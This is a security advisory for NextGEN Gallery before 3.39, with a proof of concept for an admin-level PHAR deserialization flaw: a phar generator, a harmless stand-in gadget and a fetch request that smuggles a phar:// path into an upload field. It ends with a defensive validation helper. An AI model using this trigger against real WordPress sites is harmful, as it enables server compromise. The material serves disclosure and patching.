wpexploit WPEX-ID:ED099489-1DB4-4B42-9F72-77DE39C9E01E
Published Sep 25, 2023 - 12:00 a.m.

NextGEN Gallery < 3.39 - Admin+ PHAR Deserialization

2023-09-25 00:00:00
Linwz from DEVCORE
Tags: wordpress, admin, phar deserialization, vulnerability

EPSS: 0.001 (Low), percentile 36.5%

Description

The plugin is vulnerable to PHAR Deserialization due to a lack of input parameter validation in the gallery_edit function, allowing an attacker to access arbitrary resources on the server.

1. Ensure your WordPress installation is using PHP version 7.4 or earlier (from PHP 8.0 onward, Phar metadata is no longer unserialized automatically when a phar:// path is opened, so the file operation in step 5 would not reach the gadget).
2. Create a Gallery and note its ID.
3. Create a `poc.phar` file using the following code, and add it to the root directory of the server:

```php
<?php
// Generator for poc.phar. Run it from the CLI with phar.readonly=0
// (php -d phar.readonly=0 <script>), otherwise new Phar() cannot write the file.

class Evil {}

try
{
    $pharFile = 'poc.phar';

    if (file_exists($pharFile))
    {
        unlink($pharFile);
    }

    $phar = new Phar($pharFile);

    $phar->startBuffering();
    $phar->addFromString('test.txt', 'text');
    // Minimal stub: the archive only has to be a valid phar.
    $phar->setStub('<?php __HALT_COMPILER(); ?>');
    // The metadata is what gets unserialized when phar:// is accessed (PHP < 8.0).
    $phar->setMetadata(new Evil());
    $phar->stopBuffering();

    echo "$pharFile successfully created" . PHP_EOL;
}
catch (Exception $e)
{
    echo $e->getMessage();
}
```


4. Add the following code to the server to simulate a gadget:

```php
<?php
// Stand-in gadget: must be loaded in the WordPress process so the class
// exists when the phar metadata is unserialized.
class Evil {
    function __wakeup() {
        die('Arbitrary deserialization');
    }
}
```


5. Run the following code in your browser to see the deserialization occur, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly.

```javascript
await (await fetch("/index.php", {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
    },
    "body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"image_list":[{"action":"upload","data_key":"a","filename":"xxxxxxx.jpg"}]}}]&extra_data={"a":{"tmp_name":"phar://poc.phar/tmp.png"}}',
    "method": "POST",
    "mode": "cors"
})).text();
```
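As an added example that is not the advisory's or the plugin's code, the kind of input check the description says gallery_edit lacks: a client-supplied tmp_name is vetted as a plain path before any filesystem function sees it (the helper names and the temp-directory argument are assumptions).

```php
<?php
// Added example, not the plugin's code. Hypothetical helpers showing how a
// client-supplied tmp_name must be vetted before any filesystem call sees it.

// Pure string check. It has to run before file_exists()/is_file()/copy(),
// because on PHP < 8.0 those calls on a phar:// path already unserialize
// the archive's metadata.
function looks_like_stream_wrapper(string $path): bool
{
    // Mirrors PHP's own wrapper detection: a scheme of two or more
    // scheme characters followed by ':' (covers phar://, php://, data:, ...).
    // Single-letter prefixes such as Windows drive letters are not schemes.
    if (preg_match('#^[a-z0-9+.\-]{2,}:#i', $path) === 1) {
        return true;
    }
    // Embedded NUL bytes are never part of a legitimate temp file name.
    return strpos($path, "\0") !== false;
}

// Returns the canonical path if $candidate is a genuine upload of this
// request located inside $tmp_dir, otherwise null.
function resolve_upload_tmp_name(string $candidate, string $tmp_dir): ?string
{
    if ($candidate === '' || looks_like_stream_wrapper($candidate)) {
        return null;
    }
    $real = realpath($candidate);
    $base = realpath($tmp_dir);
    if ($real === false || $base === false) {
        return null;
    }
    // Containment check: the file must live under the upload temp directory.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strpos($real, $prefix) !== 0) {
        return null;
    }
    // PHP's own record of what this request uploaded is the final authority.
    return is_uploaded_file($real) ? $real : null;
}

// Constructed input mirroring the advisory's payload: rejected by the string
// check alone, so realpath() and is_uploaded_file() never touch the phar.
$result = resolve_upload_tmp_name('phar://poc.phar/tmp.png', sys_get_temp_dir());
var_dump($result);
```

The underlying fix is structural: tmp_name should never be taken from a free-form request parameter such as extra_data at all, only from $_FILES, which this helper enforces through is_uploaded_file().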
